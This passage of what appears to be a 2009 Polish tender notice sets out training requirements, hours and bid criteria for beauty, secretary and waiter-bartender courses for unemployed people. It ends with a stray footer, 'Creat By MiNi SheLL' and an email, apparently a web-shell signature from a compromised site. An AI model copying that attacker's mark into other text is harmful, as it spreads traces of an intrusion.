<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> BLOK ZAWODOWY:
Program szkolenia musi zawierać m.in. następujące zagadnienia:
-  pielęgnację cery i ciała;
- wykonywanie różnego rodzaju makijaży
- wykonywanie zabiegów manicure i pedicure;
-  przedłużanie i modelowanie paznokci metodą żelową i akrylową
-  zdobnictwo paznokci.
Wymagana ilość godzin :
- teoretycznych  - 22
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
- praktycznych - 120
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 1 grupie 10 osobowej )
BLOK PRZEDSIĘBIORCZOŚCI
Program szkolenia musi zawierać między innymi następujące zagadnienia:
- sporządzanie biznesplanu,
- rejestrowanie działalności,
- marketing małej firmy,
- obsługa programu Płatnik i rozliczenia z ZUS,
- formy opodatkowania i rozliczenia z Urzędem Skarbowym
Wymagana ilość godzin :
- teoretycznych 10
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
- praktycznych 20
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 1 grupie 10 osobowej )
Wymagane jest jedno stanowisko komputerowe dla jednej osoby.
BLOK AKTYWNEGO POSZUKIWANIA PRACY:
W ramach tego bloku znaleźć się muszą między innymi następujące zagadnienia:
- autoprezentacja,
- rozmowa kwalifikacyjna,
- sporządzanie dokumentów aplikacyjnych.
Wymagana ilość godzin:
- teoretycznych 1 
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
- praktycznych 7 
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 1 grupie 10 osobowej)
Czas trwania szkolenia:  maksymalnie 6 tygodni przypadających w okresie wrzesień - październik 2009r. 
Zamawiający wymaga aby szkolenie realizowane było według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu zgodnie z art. 40 ust. 4 Ustawy o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. nr 69. 415 z późn. zm.). Realizując ten zapis Wykonawca powinien szkolenie przeprowadzić maksymalnie w czasie 6 tygodni..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Zakres i jakość oferowanych programów szkoleń w tym wykorzystywanie standardów kwalifikacji zawodowych i modułowych programów szkoleń zawodowych oraz - 30</li>
<li>3. Kwalifikacje kadry dydaktycznej - 10</li>
<li>4. Dostosowanie ilości i jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dydaktyczne do potrzeb określonego szkolenia, z uwzględnieniem bezpieczny - 5</li>
<li>5. Nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia - 5</li>
<li>6. Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 5</li>
<li>7. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> KURS  SEKRETARKI ASYSTENTKI SZEFA Z PODSTAWAMI JĘZYKA ANGIELSKIEGO dla 10 osób bezrobotnych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> BLOK ZAWODOWY
Program szkolenia musi zawierać między innymi następujące zagadnienia:
- obsługę urządzeń biurowych m.in. faksu, kserokopiarki, magnetowidu, dyktafonu, rzutnika, automatycznej sekretarki itp.
- zasady sporządzania pism, 
- rejestrację korespondencji,
- podstawowe zasady obsługi interesantów,
- przygotowywanie i obsługę spotkań służbowych przełożonego,
- prowadzenie terminarza przełożonego.
- obsługę komputera: korzystanie z systemu WINDOWS, edytora teksu WORD, arkusza kalkulacyjnego EXCEL, programu POWERPOINT,
- korzystanie z Internetu i poczty elektronicznej.
Wymagana ilość godzin:
- teoretycznych - 42
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
- praktycznych - 70
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 1 grupie 10 osobowej)
Wymagane jest jedno stanowisko komputerowe dla jednej osoby.
BLOK NAUKI JĘZYKA ANGIELSKIEGO
Program szkolenia musi obejmować słownictwo przydatne w zawodzie sekretarki, asystentki szefa, umożliwiające komunikowanie się w typowych sytuacjach zawodowych.
Wymagana ilość godzin:
- teoretycznych - 60 
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
BLOK AKTYWNEGO POSZUKIWANIA PRACY:
W ramach tego bloku znaleźć się muszą między innymi następujące zagadnienia:
- autoprezentacja,
- rozmowa kwalifikacyjna,
- sporządzanie dokumentów aplikacyjnych.
Wymagana ilość godzin:
- teoretycznych 1 
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
- praktycznych 7 
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 1 grupie 10 osobowej)
Czas trwania szkolenia: maksymalnie 6 tygodni przypadających w okresie wrzesień - październik 2009r. 
Zamawiający wymaga aby szkolenie realizowane było według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu zgodnie z art. 40 ust. 4 Ustawy o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. nr 69. 415 z późn. zm.). Realizując ten zapis Wykonawca powinien szkolenie przeprowadzić maksymalnie w czasie 6 tygodni..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Zakres i jakość oferowanych programów szkoleń w tym wykorzystywanie standardów kwalifikacji zawodowych i modułowych programów szkoleń zawodowych oraz - 30</li>
<li>3. Kwalifikacje kadry dydaktycznej - 10</li>
<li>4. Dostosowanie ilości i jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dydaktyczne do potrzeb określonego szkolenia, z uwzględnieniem bezpieczny - 5</li>
<li>5. Nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia - 5</li>
<li>6. Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 5</li>
<li>7. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> KURS KELNER - BARMAN Z PODSTAWAMI JĘZYKA ANGIELSKIEGO dla 10 osób bezrobotnych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> BLOK ZAWODOWY
Program szkolenia musi zawierać między innymi następujące zagadnienia:
- przygotowanie bufetu do pracy,
- obsługę klienta,
- rozliczanie bufetu,
- organizowanie przyjęć okolicznościowych,
- serwowanie potraw i napojów,
- wystawianie rachunków,
- przygotowywanie sali konsumenckiej,
- obsługę kasy fiskalnej.
Wymagana ilość godzin:
- teoretycznych  - 42
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
- praktycznych - 160
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 2 grupach 5 osobowych)
BLOK NAUKI JĘZYKA ANGIELSKIEGO
Program szkolenia musi zawierać słownictwo przydatne w zawodzie kelnera-barmana, umożliwiające komunikowanie się w typowych sytuacjach zawodowych.
Wymagana ilość godzin:
- teoretycznych 60
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
BLOK AKTYWNEGO POSZUKIWANIA PRACY:
W ramach tego bloku znaleźć się muszą między innymi następujące zagadnienia:
- autoprezentacja,
- rozmowa kwalifikacyjna,
- sporządzanie dokumentów aplikacyjnych.
Wymagana ilość godzin:
- teoretycznych 1 
(przypadających na jednego uczestnika szkolenia - zajęcia teoretyczne w 1 grupie 10 osobowej)
- praktycznych 7 
(przypadających na jednego uczestnika szkolenia - zajęcia praktyczne w 1 grupie 10 osobowej)
Czas trwania szkolenia:  maksymalnie 9 tygodni przypadających w okresie wrzesień - listopad 2009r. 
Zamawiający wymaga aby szkolenie realizowane było według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu zgodnie z art. 40 ust. 4 Ustawy o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. nr 69. 415 z późn. zm.). Realizując ten zapis Wykonawca powinien szkolenie przeprowadzić maksymalnie w czasie 9 tygodni..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Zakres i jakość oferowanych programów szkoleń w tym wykorzystywanie standardów kwalifikacji zawodowych i modułowych programów szkoleń zawodowych oraz - 30</li>
<li>3. Kwalifikacje kadry dydaktycznej - 10</li>
<li>4. Dostosowanie ilości i jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dydaktyczne do potrzeb określonego szkolenia, z uwzględnieniem bezpieczny - 5</li>
<li>5. Nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia - 5</li>
<li>6. Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 5</li>
<li>7. Zaangażowanie instytucji szkoleniowej w pozyskiwanie miejsc pracy dla przeszkolonych osób - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com